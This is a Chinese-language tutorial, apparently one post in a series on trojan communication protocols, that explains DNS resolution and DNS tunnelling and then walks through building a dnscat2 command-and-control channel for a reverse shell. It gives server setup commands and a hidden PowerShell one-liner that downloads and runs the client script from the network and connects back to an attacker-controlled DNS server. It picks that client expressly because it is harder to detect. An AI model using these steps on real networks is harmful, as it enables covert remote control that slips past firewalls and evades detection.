DNS反弹shell
在上一篇文章中,我们讲解了木马通信协议中的ICMP协议,并通过ICMP实现了一个反弹shell,本篇接着讲解一下DNS隧道,也实现一个反弹shell。
第一节
DNS协议机制
DNS隧道是建立在DNS协议机制之上,在讲解隧道之前,首先说一下DNS域名解析机制。当我们使用浏览器访问www.qq.com时,浏览器和目标网站建立连接的前提,是需要知道目标服务器的ip地址,DNS协议起的作用就在这个地方。
www.qq.com的域名解析过程是一个递归过程,步骤如下:
1、在浏览器中输入www.qq.com 域名,操作系统会先检查自己本地的hosts文件是否有这个网址映射关系,如果有,就先调用这个IP地址映射,完成域名解析。
2、如果hosts里没有这个域名的映射,则查找本地DNS解析器缓存,是否有这个网址映射关系,如果有,直接返回,完成域名解析。
3、如果hosts与本地DNS解析器缓存都没有相应的网址映射关系,首先会找TCP/ip参数中设置的首选DNS服务器,在此我们叫它本地DNS服务器,此服务器收到查询时,如果要查询的域名,包含在本地配置区域资源中,则返回解析结果给客户机,完成域名解析,此解析具有权威性。
4、如果要查询的域名,不由本地DNS服务器区域解析,但该服务器已缓存了此网址映射关系,则调用这个IP地址映射,完成域名解析,此解析不具有权威性。
5、如果本地DNS服务器本地区域文件与缓存解析都失效,则根据本地DNS服务器的设置(是否设置转发器)进行查询,如果未用转发模式,本地DNS就把请求发至13台根DNS,根DNS服务器收到请求后会判断这个域名(.com)是谁来授权管理,并会返回一个负责该顶级域名服务器的一个IP。本地DNS服务器收到IP信息后,将会联系负责.com域的这台服务器。这台负责.com域的服务器收到请求后,如果自己无法解析,它就会找一个管理.com域的下一级DNS服务器地址(http://qq.com)给本地DNS服务器。当本地DNS服务器收到这个地址后,就会找http://qq.com域服务器,重复上面的动作,进行查询,直至找到www.qq.com主机。
6、如果用的是转发模式,此DNS服务器就会把请求转发至上一级DNS服务器,由上一级服务器进行解析,上一级服务器如果不能解析,或找根DNS或把转请求转至上上级,以此循环。不管是本地DNS服务器用是是转发,还是根提示,最后都是把结果返回给本地DNS服务器,由此DNS服务器再返回给客户机
第二节
DNS隧道原理
DNS隧道的存在,必然有相应的应用场景,其实也是为了规避防火墙对协议的检测,无论防火墙检测多么严格,一般都会开启DNS查询的53端口。
DNS隧道可以分为直连和中继两种。直连也就是Client直接和指定的目标DNS Server(Authoritative NS Server)连接,通过将数据编码封装在DNS协议中进行通信,这种方式速度快,但是隐蔽性比较弱,很容易被探测到,其实本质上是典型的C/S结构。另外限制比较高,很多场景不允许自己指定DNS Server。
而通过DNS迭代查询而实现的中继隧道,则更为隐秘,但同时因为数据包到达目标DNS Server前需要经过多个节点,所以速度上较直连慢很多。DNS隧道的中继模式过程如下图所示,其根本目标是让DNS数据包传输到我们自己指定的DNS权威服务器。
上图中,由于防火墙的规则限制,内网中的两台电脑无法访问外网,但防火墙上对于DNS的流量是放行的。当需要解析的域名,本地DNS服务器无法给出回答时,本地DNS服务器就会采用迭代查询通过互联网与各级域的权威服务器进行查询,比如从com域的服务器得到qq.com域的权威服务器地址,最后定位到所查询域的权威DNS服务器,形成一个逻辑信道。所以,我们可以将通信的数据封装在客户端查询的请求中,当请求的数据包经过上图的路径,最终到达我们控制的权威DNS Server时,再从请求数据包中解析出数据,并将相应的数据封装在DNS 响应中,返回给客户端完成通信。
中继模式的实现有两个关键点,一个是有一台自己控制的权威DNS服务器,另一个是对DNS缓存机制的规避,因为如果需要解析的域名在本地DNS服务器中已经有缓存时,本地DNS服务器就不会转发数据包。所以在我们构造的请求中,每次查询的域名都是不一样的或者是已经是过期的。
第三节
架设C&C
如何搭建DNS隧道,甚至反弹shell呢?我的测试平台直接部署在真实的网络环境中。
首先需要一台vps和一个域名,我买了一台阿里云的服务器,并注册一个域名,假定服务器ip为xxx.xxx.xxx.xxx,域名为:aaa.com。接下来配置一台权威的DNS服务器,用来接收中继的数据包。对于注册的域名,我们需要配置两条记录,一条是NS记录,一条是A记录。
NS记录设置主机记录为 c.aaa.com,记录值为ns1.aaa.com (主机记录和记录值可随意配置)
NS记录设置的含义是 假如我想查询 c.aaa.com对应的ip,需要询问ns1.aaa.com对应的服务器。其实就是将DNS解析数据包转发给了ns1.aaa.com对应的服务器。
A记录设置主机记录为 ns1.aaa.com,记录值为xxx.xxx.xxx.xxx(主机记录需要和上图的记录值相对应)
在上面的NS记录中,查询 c.aaa.com的DNS解析数据包转发给了ns1.aaa.com,A记录的含义是将ns1.aaa.com解析到我们自己的服务器IP上,这样查询 c.aaa.com的DNS解析数据包就会转发到我们自己的服务器上。
权威DNS服务器配置完成,使用DNS协议创建加密C&C通道,咱们需要使用dnscat2,这是一个开源的软件。
代码语言:javascript复制 https://github.com/iagox86/dnscat2
该软件提供了服务器端和客户端,服务端部署到咱们的权威DNS服务器上,而客户端部署到内网服务器中。不过客户端,我们使用一个powershell的版本,这样更加难检测。
代码语言:javascript复制https://github.com/lukebaggett/dnscat2-powershell
在云服务器xxx.xxx.xxx.xxx上安装Dnscat2服务端,步骤如下:
代码语言:javascript复制
# apt-get update
# apt-get -y install ruby-dev git make g
# gem install bundler
# git clone https://github.com/iagox86/dnscat2.git
# cd dnscat2/server
# bundle install
安装完成后,在dnscat2/server目录下运行server端:
代码语言:javascript复制ruby ./dnscat2.rb c.fankehui.cn -e open -c dnsvirus --no-cache
- -c参数定义了pre-shared secret,在服务器端和客户端使用相同加密的秘密dnsvirus,可以防止man-in-the-middle。
- -e参数可以规定安全级别,open代表让客户端进行选择。
- --no-cache,请务必在运行服务器时添加无缓存选项,因为powershell-dnscat2客户端与dnscat2服务器的caching模式不兼容。
执行完命令效果如下:
在windows上运行powershell客户端:
代码语言:javascript复制powershell.exe -nop -w hidden -c {IEX(New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/ dnscat2-powershell/master/dnscat2.ps1'); Start-Dnscat2 -Domain c.aaa.com -PreSharedSecret dnsvirus}
- -Domain参数需要指定你设置的NS域名
- -PreSharedSecret 为指定的密钥和服务端保持一致
此时,我们已可以在服务器上看到客户端上线提示。